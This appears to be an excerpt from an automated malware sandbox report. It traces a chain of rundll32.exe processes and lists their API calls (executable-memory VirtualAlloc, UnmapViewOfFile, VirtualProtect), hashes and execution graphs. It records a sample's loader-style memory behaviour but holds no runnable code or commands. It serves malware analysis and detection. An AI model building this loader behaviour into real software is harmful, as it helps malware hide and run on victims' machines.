                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0012F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2197095274.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_110000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: 386ac353dc2f027dbf529e201855683646225776c1ed6e9d1923fde277413059
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 6A113060D08289EEEF01D7E894097EEBFB55B21708F0440A8E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2556 Parent PID: 2504 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 19fed0 1174 19feed 1173->1174 1179 19f550 1174->1179 1176 19ff7c 1182 19fb30 VirtualAlloc 1176->1182 1178 19ffb3 1180 19f591 1179->1180 1181 19f5c4 VirtualAlloc 1180->1181 1181->1176 1183 19fb8e 1182->1183 1184 19fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 19fc50 1184->1186 1185 19fd7d 1185->1178 1186->1185 1187 19fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Function 0019FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2206739849.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0019F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 19f550-19f59b call 19f960 42 19f5aa-19f5da call 19f330 VirtualAlloc 39->42 43 19f59d-19f5a7 call 19f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2206739849.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 620 Parent PID: 2556 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 1cfed0 1174 1cfeed 1173->1174 1179 1cf550 1174->1179 1176 1cff7c 1182 1cfb30 VirtualAlloc 1176->1182 1178 1cffb3 1180 1cf591 1179->1180 1181 1cf5c4 VirtualAlloc 1180->1181 1181->1176 1183 1cfb8e 1182->1183 1184 1cfc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 1cfc50 1184->1185 1186 1cfd7d 1185->1186 1187 1cfd52 VirtualProtect 1185->1187 1186->1178 1187->1185

                                                                      Executed Functions

                                                                      Function 001CFB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CFB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 001CFC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001CFC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001CFD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2217174242.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_1b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 45f389ec2aa4e51a2fc57f289db33ff4fa75fe6bb965d181c0219365a9862601
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 45B1AAB5A00109DFCB48CF84C590EAEB7B6BF98314F208159E919AB355D735EE82CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001CF550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 1cf550-1cf59b call 1cf960 42 1cf59d-1cf5a7 call 1cf960 39->42 43 1cf5aa-1cf5da call 1cf330 VirtualAlloc 39->43 42->43
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CF5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2217174242.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_1b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: 27437ec5208aa4086a4bf65c4afb43b2448d1d2896a45ea183c8e927ae75f31f
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: C61133A0D082C9EEEF01D7E88405BEEBFB55B21704F044098E5446A282D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2288 Parent PID: 620 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 19fed0 1174 19feed 1173->1174 1179 19f550 1174->1179 1176 19ff7c 1182 19fb30 VirtualAlloc 1176->1182 1178 19ffb3 1180 19f591 1179->1180 1181 19f5c4 VirtualAlloc 1180->1181 1181->1176 1183 19fb8e 1182->1183 1184 19fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 19fc50 1184->1186 1185 19fd7d 1185->1178 1186->1185 1187 19fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Function 0019FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2226022249.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0019F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 19f550-19f59b call 19f960 42 19f5aa-19f5da call 19f330 VirtualAlloc 39->42 43 19f59d-19f5a7 call 19f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2226022249.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 1928 Parent PID: 2288 rundll32.exeCOMMON

                                                                      Executed Functions

                                                                      Function 0014FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0014FB75
                                                                      • UnmapViewOfFile.KERNEL32(?), ref: 0014FC25
                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0014FC3F
                                                                      • VirtualProtect.KERNEL32(?,?,00000000), ref: 0014FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.2339354576.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 8a1153281cf7b3d8a74905fabf6c6c09a49ce1311eafc2b1b0eded3b52a143ad
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 7BB188B5E001099FCB48CF84D590EAEB7B5FF88314F248159E919AB355D735EE82CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0014F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 14f550-14f59b call 14f960 42 14f59d-14f5a7 call 14f960 39->42 43 14f5aa-14f5da call 14f330 VirtualAlloc 39->43 42->43
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0014F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.2339354576.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c6c412b1bbc447a28259970365211f4b63b13cc70bc42bd4fb778739b311ea40
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 3B113360D08289EEEB01D7E8C4057EEBFB55B21704F044098E5446A382D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions